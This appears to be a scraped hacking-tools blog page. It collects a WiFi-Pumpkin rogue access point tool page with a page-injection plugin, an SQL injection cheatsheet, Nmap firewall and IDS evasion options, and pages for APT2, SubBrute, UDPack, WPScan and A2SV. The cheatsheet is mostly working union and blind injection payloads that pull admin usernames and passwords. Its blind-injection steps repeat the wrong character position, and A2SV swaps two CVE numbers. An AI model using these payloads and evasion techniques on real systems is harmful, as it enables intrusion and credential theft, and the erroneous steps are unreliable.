Framework for Rogue Wi-Fi Access Point Attack - WiFi-Pumpkin v0.8.1

Framework for Rogue Wi-Fi Access Point Attack

Description
WiFi-Pumpkin is a open source security tool that provides the Rogue access point to Man-In-The-Middle and network attacks.

Installation
Kali 2.0/WifiSlax 4.11.1/Parrot 3.0.1/2.0.5

• Python 2.7

 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
 cd WiFi-Pumpkin
 ./installer.sh --install

refer to the wiki for Installation

Features

• Rogue Wi-Fi Access Point
• Deauth Attack Clients AP
• Probe Request Monitor
• DHCP Starvation Attack
• Credentials Monitor
• Transparent Proxy
• Windows Update Attack
• Phishing Manager
• Partial Bypass HSTS protocol
• Support beef hook
• Mac Changer
• ARP Poison
• DNS Spoof
• Patch Binaries via MITM

Plugins

Plugin	Description
net-creds	Sniff passwords and hashes from an interface or pcap file
dns2proxy	This tools offer a different features for post-explotation once you change the DNS server to a Victim.
sslstrip2	Sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks based version fork @LeonardoNve/@xtr4nge.
sergio-proxy	Sergio Proxy (a Super Effective Recorder of Gathered Inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework.
BDFProxy-ng	Patch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy @secretsquirrel.

Transparent Proxy
Transparent proxies that you can use to intercept and manipulate HTTP/HTTPS traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "Proxy" automatically will be listed on PumpProxy tab.

Plugins Example
The following is a sample module that injects some contents into the tag to set blur filter into body html page:

import logging
from Plugin import PluginProxy
from Core.Utils import setup_logger

class blurpage(PluginProxy):
    ''' this module proxy set blur into body page html response'''
    _name          = 'blur_page'
    _activated     = False
    _instance      = None
    _requiresArgs  = False

    @staticmethod
    def getInstance():
        if blurpage._instance is None:
            blurpage._instance = blurpage()
        return blurpage._instance

    def __init__(self):
        self.injection_code = []

    def LoggerInjector(self,session):
        setup_logger('injectionPage', './Logs/AccessPoint/injectionPage.log',session)
        self.logging = logging.getLogger('injectionPage')

    def setInjectionCode(self, code,session):
        self.injection_code.append(code)
        self.LoggerInjector(session)

    def inject(self, data, url):
        injection_code = '''<head> <style type="text/css">
        body{
        filter: blur(2px);
        -webkit-filter: blur(2px);}
        </style>'''
        self.logging.info("Injected: %s" % (url))
        return data.replace('<head>',injection_code )

Screenshots

• Kali Linux 2.0

• kubuntu 15.10 

• Parrot OS

FAQ
FAQ on the wiki

Download WiFi-Pumpkin

Read More

Full SQL Injections - Cheatsheet

[1]* -Introducing The SQL Injection Vuln:

SQL injection attacks are known also as SQL insertion
it's in the form of executing some querys in the database and getting acces to informations (SQL Vesion, Number & Names of tables and columns,some authentification infos,ect...)

[2]* -Exploiting Sql Injection Vuln :

Before proceeding to the exploitation of sql injections we have to checking for this vulnerability, so we have an exemple

http://www.website.com/articles.php?id=3

for checking the vulnerability we have to add ' (quote) to the url , lets see together

http://www.website.com/articles.php?id=3'

now, if we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

this website is vulnerable to sql injection, and if we don't get anything we can't exploiting this vulnerability.

Now, Lets go to exploiting this vuln and finding some informations about this sql database


certainly before doing anything we have to find the number of columns

[-] Finding the number of columns:

for finding the number of columns we use ORDER BY to order result in the database

lets see that ,

http://www.website.com/articles.php?id=3 order by 1/*

and if we havn't any error we try to change the number

http://www.website.com/articles.php?id=3 order by 2/*

still no error,so we continu to change the number

http://www.website.com/articles.php?id=3 order by 3/*

no error to

http://www.website.com/articles.php?id=3 order by 4/*

no error

http://www.website.com/articles.php?id=3 order by 5/*

yeah , here we have this error (Unknown column '5' in 'order clause')

so, this database has 4 colmuns because the error is in the 5

now, we try to check that UNION function work or not

[-] Checking UNION function :

for using UNION function we select more informations from the database in one statment

so we try this

http://www.website.com/articles.php?id=3 union all select 1,2,3,4/* (in the end it's 4 because we have see the number of columns it's 4)

now, if we see some numbers in the page like 1 or 2 or 3 or 4 == the UNION function work

if it not work we try to change the /* to --

so we have this

http://www.website.com/articles.php?id=3 union all select 1,2,3,4--

after checking the UNION function and it works good we try to get SQL version

[-] Getting SQL Version :

now we have a number in the screen after checking the UNION

we say in example that this number is 3

so we replace 3 with @@version or version()

http://www.website.com/articles.php?id=3 union all select 1,2,@@version,4/*

and now we have the version in the screen!

lets go now to get tables and columns names


[-] Getting tables and columns names :

here we have a job to do!!

if the MySQL Version is < 5 (i.e 4.1.33, 4.1.12...)

lets see that the table admin exist!

http://www.website.com/articles.php?id=3 union all select 1,2,3,4,5 from admin/*

and here we see the number 3 that we had in the screen

now, we knows that the table admin exists

here we had to check column names:

http://www.website.com/articles.php?id=3 union all select 1,2,username,4,5 from admin/*

if we get an error we have to try another column name

and if it work we get username displayed on screen (example: admin,moderator,super moderator...)

after that we can check if column password exists

we have this

http://www.website.com/articles.php?id=3 union all select 1,2,password,4,5 from admin/*

and oups! we see password on the screen in a hash or a text

now we have to use 0x3a for having the informations like that username:password ,dmin:unhash...

http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*

this is the sample SQL Injection , now, we will go to the blind sql injection (more difficult)


[3]* -Exploiting Blind SQL Injection Vuln :

first we should check if website is vulnerable for example

http://www.website.com/articles.php?id=3

and to test the vulnerability we had to use

http://www.website.com/articles.php?id=3 and 1=1 ( we havn't any error and the page loads normally)

and now

http://www.website.com/articles.php?id=3 and 1=2

here we have some problems with text, picture and some centents ! and it's good! this website is vulnerable for Blind SQL Injection

we have to check MySQL Version

[-] Getting MySQL Version :

we use substring in blind injection to get MySQL Version

http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=4

we should replace the 4 with 5 if the version is 5

http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=5

and now if the function select do not work we should use subselect and we should testing if it work

[-] Testing if subselect works :

http://www.website.com/articles.php?id=3 and (select 1)=1 ( if the page load normaly the subselect works good)

and now we have to see if we have access to mysql.user

http://www.website.com/articles.php?id=3 and (select 1 from mysql.user limit 0,1)=1 (if it load normaly we have access to mysql.user)

now, we can checking table and column names

[-] Checking table and column names :

http://www.website.com/articles.php?id=3 and (select 1 from users limit 0,1)=1

if the page load normaly and no errors the table users exists

now we need column name

http://www.website.com/articles.php?id=3 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page load normaly and no errors the column password exists

now we have the table and the column , yeah, we can exploiting the vunlnerability now

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

the page load normaly and no errors,so we need to change the 80 for having an error

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90

no errors ! we continu

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

Yeah!! an error

the character is char(99). we use the ascii converter and we know that char(99) is letter 'c'

to test the second character we change ,1,1 to ,2,1

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

the page load normaly

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

the page loads normally, higher !!!

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

error ! lower number

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

Error That we search!!

now, we know that the second character is char(105) and that is 'i' with the ascii converter. We have 'ci' now from the first and the second charactets

our tutorial draws to the close!

Thanks you for reading and i hope that you have understand SQL Injection and exploitations of this vulnerability .

Source: www.exploit-db.com

By OffensiveSec

Read More

Firewall and IDS Evasion / Bypassing the Firewalls and IDS/IPS - NMAP Scanning Tutorial

This post is for penetration testers that face issues with scanning the Corporate networks with firewalls deployed and are unable to bypass the Firewall or an IDS/IPS .
Firewall is generally a software or hardware to protect private network from public network.This is a trouble maker for the Penetration testers as they are not able to bypass this added layer of security .
Well the good news here is that we can use Nmap options to bypass the firewalls , IDS/IPS .
If a penetration tester can bypass firewall then half game is won for the penetration tester. In this tutorial you will learn how to bypass and test firewall using the NMAP options.

NMAP options to Bypass the Firewall :

• -f (fragment packets):

This option is to make it harder to detect the packets. By specifying this option once, Nmap will split the packet into 8 bytes or less after the IP header. This makes the detection of Nmap sent packets difficult .

• –mtu:

With this option, you can specify your own packet size fragmentation. The Maximum Transmission Unit (MTU) must be a multiple of eight or Nmap will give an error and exit. This helps in Firewall Evasion .

• -D (decoy):

By using this option, Nmap will send some of the probes from the spoofed IP addresses specified by the user. The idea is to mask the true IP address of the user in the logfiles. The user IP address is still in the logs. You can use RND to generate a random IP address or RND:number to generate the <number> IP address. The hosts you use for decoys should be up, or you will flood the target. Also remember that by using many decoys you can cause network congestion, so you may want to avoid that especially if you are scanning your client network.

• –source-port <portnumber> or –g (spoof source port):

This option will be useful if the firewall is set up to allow all incoming traffic that comes from a specific port.

• –data-length:

This option is used to change the default data length sent by Nmap in order to avoid being detected as Nmap scans.

• –max-parallelism:

This option is usually set to one in order to instruct Nmap to send no more than one probe at a time to the target host.

• –scan-delay <time>:

This option can be used to evade IDS/IPS that uses a threshold to detect port scanning activity. Setting the Scan delay is always a good idea when you want to evade any security device .

Sources : Nmap.org

OffSec 

http://nmap.org/book/man-bypass-firewalls-ids.html

Read More

Automated Penetration Toolkit - APT2

This tool will perform an NMap scan, or import the results of a scan from Nexpose, Nessus, or NMap. The processesd results will be used to launch exploit and enumeration modules according to the configurable Safe Level and enumerated service information.

All module results are stored on localhost and are part of APT2's Knowledge Base (KB). The KB is accessible from within the application and allows the user to view the harvested results of an exploit module.

Setup
On Kali Linux install python-nmap library:

sudo pip install python-nmap
sudo pip install neovim

Configuration (Optional)
APT2 uses the default.cfg file in the root directory. Edit this file to configure APT2 to run as you desire.
Current options include:

• metasploit
• nmap
• threading

Metasploit RPC API (metasploit)
APT2 can utuilize your host's Metasploit RPC interface (MSGRPC). Additional Information can be found here: https://help.rapid7.com/metasploit/Content/api-rpc/getting-started-api.html

NMAP
Configure NMAP scan settings to include the target, scan type, scan port range, and scan flags. These settings can be configured while the program is running.

Threading
Configure the number of the threads APT2 will use.

Run:

No Options:
python apt2 or ./apt2

With Configuration File
python apt2 -C <config.txt>

Import Nexpose, Nessus, or NMap XML
python apt2 -f <nmap.xml>

Specify Target Range to Start
python apt2 -f 192.168.1.0/24

Safe Level
Safe levels indicate how safe a module is to run againsts a target. The scale runs from 1 to 5 with 5 being the safest. The default configuration uses a Safe Level of 4 but can be set with the -s or --safelevel command line flags.

Usage:

usage: apt2.py [-h] [-C <config.txt>] [-f [<input file> [<input file> ...]]]
               [--target] [--ip <local IP>] [-v] [-s SAFE_LEVEL] [-b]
               [--listmodules]

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbosity       increase output verbosity
  -s SAFE_LEVEL, --safelevel SAFE_LEVEL
                        set min safe level for modules
  -b, --bypassmenu      bypass menu and run from command line arguments

inputs:
  -C <config.txt>       config file
  -f [<input file> [<input file> ...]]
                        one of more input files seperated by spaces
  --target              initial scan target(s)

ADVANCED:
  --ip <local IP>       defaults to ip of interface

misc:
  --listmodules         list out all current modules

Modules

-----------------------
LIST OF CURRENT MODULES
-----------------------
nmaploadxml               Load NMap XML File
hydrasmbpassword          Attempt to bruteforce SMB passwords
nullsessionrpcclient      Test for NULL Session
msf_snmpenumshares        Enumerate SMB Shares via LanManager OID Values
nmapbasescan              Standard NMap Scan
impacketsecretsdump       Test for NULL Session
msf_dumphashes            Gather hashes from MSF Sessions
msf_smbuserenum           Get List of Users From SMB
anonftp                   Test for Anonymous FTP
searchnfsshare            Search files on NFS Shares
crackPasswordHashJohnTR   Attempt to crack any password hashes
msf_vncnoneauth           Detect VNC Services with the None authentication type
nmapsslscan               NMap SSL Scan
nmapsmbsigning            NMap SMB-Signing Scan
responder                 Run Responder and watch for hashes
msf_openx11               Attempt Login To Open X11 Service
nmapvncbrute              NMap VNC Brute Scan
msf_gathersessioninfo     Get Info about any new sessions
nmapsmbshares             NMap SMB Share Scan
userenumrpcclient         Get List of Users From SMB
httpscreenshot            Get Screen Shot of Web Pages
httpserverversion         Get HTTP Server Version
nullsessionsmbclient      Test for NULL Session
openx11                   Attempt Login To Open X11 Servicei and Get Screenshot
msf_snmplogin             Attempt Login Using Common Community Strings
msf_snmpenumusers         Enumerate Local User Accounts Using LanManager/psProcessUsername OID Values
httpoptions               Get HTTP Options
nmapnfsshares             NMap NFS Share Scan
msf_javarmi               Attempt to Exploit A Java RMI Service
anonldap                  Test for Anonymous LDAP Searches
ssltestsslserver          Determine SSL protocols and ciphers
gethostname               Determine the hostname for each IP
sslsslscan                Determine SSL protocols and ciphers
nmapms08067scan           NMap MS08-067 Scan
msf_ms08_067              Attempt to exploit MS08-067

Download APT2

Read More

A DNS meta-query spider that enumerates DNS records, and subdomains - SubBrute v2.0

SubBrute is a community driven project with the goal of creating the fastest, and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting ( https://www.us-cert.gov/ncas/alerts/TA13-088A ). This design also provides a layer of anonymity, as SubBrute does not send traffic directly to the target's name servers.

Whats new in v2.0?

A lot of exciting updates... except for the readme file, which still needs to be updated.

Whats new in v1.2.1?

The big news in this version is that SubBrute is now a recursive DNS-spider, and also a library, more on this later. SubBrute should be easy to use, so the interface should be intuitive (like nmap!), if you would like the interface to change, let us know. In this version we are opening up SubBrute's fast DNS resolution pipeline for any DNS record type. Additionally, SubBrute now has a feature to detect subdomains were their resolution is intentionally blocked, which sometimes happens when a subdomain is intended for for use on an internal network.

• SubBrute is now a DNS spider that recursively crawls enumerated DNS records. This feature boosted *.google.com from 123 to 162 subdomains. (Always enabled)
• --type enumerate an arbitrary record type (AAAA, CNAME, SOA, TXT, MX...)
• -s can now read subdomains from result files.
• New useage - The subdomains enumerated from previous scans can now be used as input to enumerate other DNS records. The following commands demonstrate this new functionality:

    ./subbrute.py google.com -o google.names
        ...162 subdomains found...

    ./subbrute.py -s google.names google.com --type TXT
        google.com,"v=spf1 include:_spf.google.com ip4:216.73.93.70/31 ip4:216.73.93.72/31 ~all"
        adwords.google.com,"v=spf1 redirect=google.com"
        ...

    ./subbrute.py -s google.names google.com --type CNAME
        blog.google.com,www.blogger.com,blogger.l.google.com
        groups.google.com,groups.l.google.com
        ...

• SubBrute is now a subdomain enumeration library with a python interface: subbrute.run() Do you want to use SubBrute in your python projects? Consider the following:

    import subbrute

    for d in subbrute.run("google.com"):
        print d 

Feedback welcome.

Whats new in v1.1?
This version merges pull requests from the community; changes from JordanMilne, KxCode and rc0r is in this release. In SubBrute 1.1 we fixed bugs, improved accuracy, and efficiency. As requested, this project is now GPLv3.
Accuracy and better wildcard detection:

• A new filter that can pickup geolocation aware wildcards.
• Filter misbehaving nameservers

Faster:

• More than 2,000 high quality nameservers were added to resolvers.txt, these servers will resolve multiple queries in under 1 sec.
• Nameservers are verified when they are needed. A seperate thread is responsible creating a feed of nameservers, and corresponding wildcard blacklist.

New output:

• -a will list all addresses associated with a subdomain.
• -v debug output, to help developers/hackers debug subbrute.
• -o output results to file.

More Information
The 'names.txt' list was created using some creative Google hacks with additions from the community. SubBrute has a feature to build your own subdomain lists by matching sub-domains with regular expression and sorting by frequency of occurrence:

• python subroute.py -f full.html > my_subs.txt

names.txt contains 31298 subdomains. subs_small.txt was stolen from fierce2 which contains 1896 subdomains. If you find more subdomains to add, open a bug report or pull request and I'll be happy to add them.
No install required for Windows, just cd into the 'windows' folder:

• subbrute.exe google.com

Easy to install: You just need http://www.dnspython.org/ and python2.7 or python3. This tool should work under any operating system: bsd, osx, windows, linux...
(On a side note giving a makefile root always bothers me, it would be a great way to install a backdoor...)
Under Ubuntu/Debian all you need is:

• sudo apt-get install python-dnspython

On other operating systems you may have to install dnspython manually:
http://www.dnspython.org/
Easy to use:

• ./subbrute.py google.com

Tests multiple domains:

• ./subbrute.py google.com gmail.com blogger.com

or a newline delimited list of domains:

• ./subbrute.py -t list.txt

Also keep in mind that subdomains can have subdomains (example: _xmpp-server._tcp.gmail.com):

• ./subbrute.py gmail.com > gmail.out
  
• ./subbrute.py -t gmail.out
  

Cheers!

Download SubBrute

Read More

An Extensible Generic UDP Packet Obfuscator - UDPack

UDPack is an extensible generic UDP packet obfuscator. The purpose of this application is to sit in the path of a UDP data stream, and obfuscate, deobfuscate or otherwise modify the packets.

Python 3.4 or above is required, since this script uses the asyncio library. Currently there are no other dependencies.

Warning: It must be stressed that the purpose of this application is obfuscation , not encryption . Many design decisions have been (and will be) deliberately made against best practices in cryptography, so in all likelihood the obfuscation methods will not resist crypto analysis. DO NOT rely on the obfuscation for confidentiality of your data!!!

At this stage the script includes the following "packers" (obfuscation methods):

• Straight through: no obfuscation
• Shuffle: shuffle the order of data bytes in each packet

Typical usage
A "packer" is a particular implementation of obfuscation method, usually obfuscating packets travelling upstream and deobfuscating packets travelling downstream. An "unpacker" is the same thing, implemented in the opposite direction.

            raw data         obfuscated data           raw data
UDP Client ---------- Packer =============== Unpacker ---------- UDP server
             upstream ==>                      <== downstream

Implementing new packers and unpackers
In most cases, to implement a new packer, simply inherit from UDPackStraightThroughPacker and implement pack and unpack methods. To implement the corresponding unpacker, inherit from UDPackUnpackerMixIn and the completed packer.

Download UDPack

Read More

Finding WordPress Vulnerabilities - Using WPScan

When using WPScan you can scan your WordPress website for known vulnerabilities within the core version, plugins, and themes. You can also find out if any weak passwords, users, and security configuration issues are present. The database at wpvulndb.com is used to check for vulnerable software and the WPScan team maintains the ever-growing list of vulnerabilities.
This time we are going to dive into how to use WPScan with the most basic commands.

Updating WP Scan

You should always update WPScan to leverage the latest database before you scan your website for vulnerabilities.
Open Terminal and change your directory to the wpscan folder we downloaded in the first tutorial:

cd wpscan

From this directory we can run a command to pull the latest update from Github, and then another command to update the database.

git pull
ruby wpscan.rb --update

You will see the WPScan logo and a note that the the database update has completed successfully.

    WP Scan Database Update in Terminal

Scanning for Vulnerabilities

Next we are going to point the WPScan application at your WordPress website. With a few commands we can check your website for vulnerable themes, plugins, and users. This will let you know if your website has a high risk of becoming infected. From there you can take steps to secure your site by updating or disabling the security problems.
WPScan commands will always start with ruby wpscan.rb followed by your website URL.
ruby wpscan.rb --url http://yourwebsite.com
Running the basic command above will perform a quick scan of the website to identify your active theme and basic issues, such as exposed WordPress version numbers. You can also look for specific vulnerabilities by adding arguments to the end of this basic command.

Checking for Vulnerable Plugins

Adding the –enumerate vp argument checks the WordPress website for vulnerable plugins.

ruby wpscan.rb --url http://yourwebsite.com --enumerate vp

If vulnerable plugins are found you will see red exclamation icons and references to further information. Any vulnerable plugin should be replaced and removed if you cannot update it to patch the vulnerability.

Checking for Vulnerable Themes

Similarly, adding –enumerate vt to the command checks the WordPress website for vulnerable themes.

ruby wpscan.rb --url http://yourwebsite.com --enumerate vt

As with plugins, look for red exclamation icons and URLs with more information. Any vulnerable theme should be replaced and removed if you cannot update it to patch the vulnerability.

Checking User Enumeration

When hackers know your WordPress usernames it becomes easier for them to perform a successful brute force attack. If attackers gain access to one of your users with sufficient permissions, they can gain control of your WordPress installation.
To find out the login names of users on your WordPress website, we will use the argument –enumerate u at the end of the command.

ruby wpscan.rb --url http://yourwebsite.com --enumerate u

Ideally you should not be able to list the login names of your WordPress users.
If you have a Website Firewall or a plugin that stops WPScan, you may see an error like this:

WPScan stopped by CloudProxy WAF

It is always best to use a different nickname than the one used to login and some .htaccess solutions also exist for preventing user enumeration.

Password Guessing

Now we are going to try a number of passwords. If you have a list of passwords, WPScan can use the list to try logging in to each user account that it finds. This way you can see if any of your users are practicing poor password habits.
You can create or gather a wordlist, which is just a text file with passwords on each line. Hackers have huge collections of passwords but you can make a simple text document containing a decent number of top passwords. The file just needs to be placed in your wpscan directory so that the WPScan application can easily use it.
When you have the wordlist file in the WPScan directory, you can add the –wordlist argument along with the name of the wordlist file. You can also specify the number of threads to use at the same time to process the list. Depending on the length of the wordlist, it could take a lot of time or computer resources to complete.

ruby wpscan.rb --url http://yourwebsite.com --wordlist passwords.txt threads 50

Download WPScan

Read More

Auto Scanning to SSL Vulnerability - A2SV

                    █████╗ ██████╗ ███████╗██╗   ██╗
                   ██╔══██╗╚════██╗██╔════╝██║   ██║
                   ███████║ █████╔╝███████╗██║   ██║
    .o oOOOOOOOo   ██╔══██║██╔═══╝ ╚════██║╚██╗ ██╔╝        OOOo
    Ob.OOOOOOOo O  ██║  ██║███████╗███████║ ╚████╔╝   .adOOOOOOO
    OboO'''''''''' ╚═╝  ╚═╝╚══════╝╚══════╝  ╚═══╝  ''''''''''OO
    OOP.oOOOOOOOOOOO 'POOOOOOOOOOOo.   `'OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo'OOOOOOOOOOO` .adOOOOOOOOO'oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 ''OOOOOOOOOOOOOOOO'`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO'`  ''OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 'OOOO'       'YOoOOOOMOIONODOO'`  .   ''OOROAOPOEOOOoOY'     'OOO'
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP'%OOOOOOOOoOOOOOOO?oOOOOO?OOOO'OOo
                 '%o  OOOO'%OOOO%'%OOOOO'OOOOOO'OOO':
                      `$'  `OOOO' `O'Y ' `OOOO'  o             .
    .                  .     OP'          : o     .
                              :
                   [Auto Scanning to SSL Vulnerability]
                       [By Hahwul / www.hahwul.com]

1. A2SV?
Auto Scanning to SSL Vulnerability.
HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc

A. Support Vulnerability

[CVE-2014-0160] CCS Injection
[CVE-2014-0224] HeartBleed
[CVE-2014-3566] SSLv3 POODLE
[CVE-2015-0204] FREAK Attack
[CVE-2015-4000] LOGJAM Attack

B. Dev Plan

[DEV] DROWN Attack
[PLAN] SSL ACCF

2. How to Install?
A. Download(clone) & Unpack A2SV

git clone https://github.com/hahwul/a2sv.git
cd a2sv

B. Install Python Package / OpenSSL

pip install argparse
pip install netaddr

apt-get install openssl

C. Run A2SV

python a2sv.py -h

3. How to Use?

usage: a2sv.py [-h] [-t TARGET] [-p PORT] [-m MODULE] [-v]
optional arguments:
-h, --help            show this help message and exit
-t TARGET, --target TARGET
                      Target URL/IP Address
-p PORT, --port PORT  Custom Port / Default: 443
-m MODULE, --module MODULE
                      Check SSL Vuln with one module
                      [h]: HeartBleed
                      [c]: CCS Injection
                      [p]: SSLv3 POODLE
                      [f]: OpenSSL FREAK
                      [l]: OpenSSL LOGJAM
-u, --update          Update A2SV (GIT)
-v, --version         Show Version

[Scan SSL Vulnerability]

python a2sv.py -t 127.0.0.1
python a2sv.py -t 127.0.0.1 -m heartbleed
python a2sv.py -t 127.0.0.1 -p 8111

[Update A2SV]

python a2sv.py -u
python a2sv.py --update

4. Support
Contact hahwul@gmail.com


5. Screenshot

6. Code Reference Site

poodle : https://github.com/supersam654/Poodle-Checker
heartbleed : https://github.com/sensepost/heartbleed-poc
ccs injection : https://github.com/Tripwire/OpenSSL-CCS-Inject-Test
freak : https://gist.github.com/martinseener/d50473228719a9554e6a

Download A2SV

Read More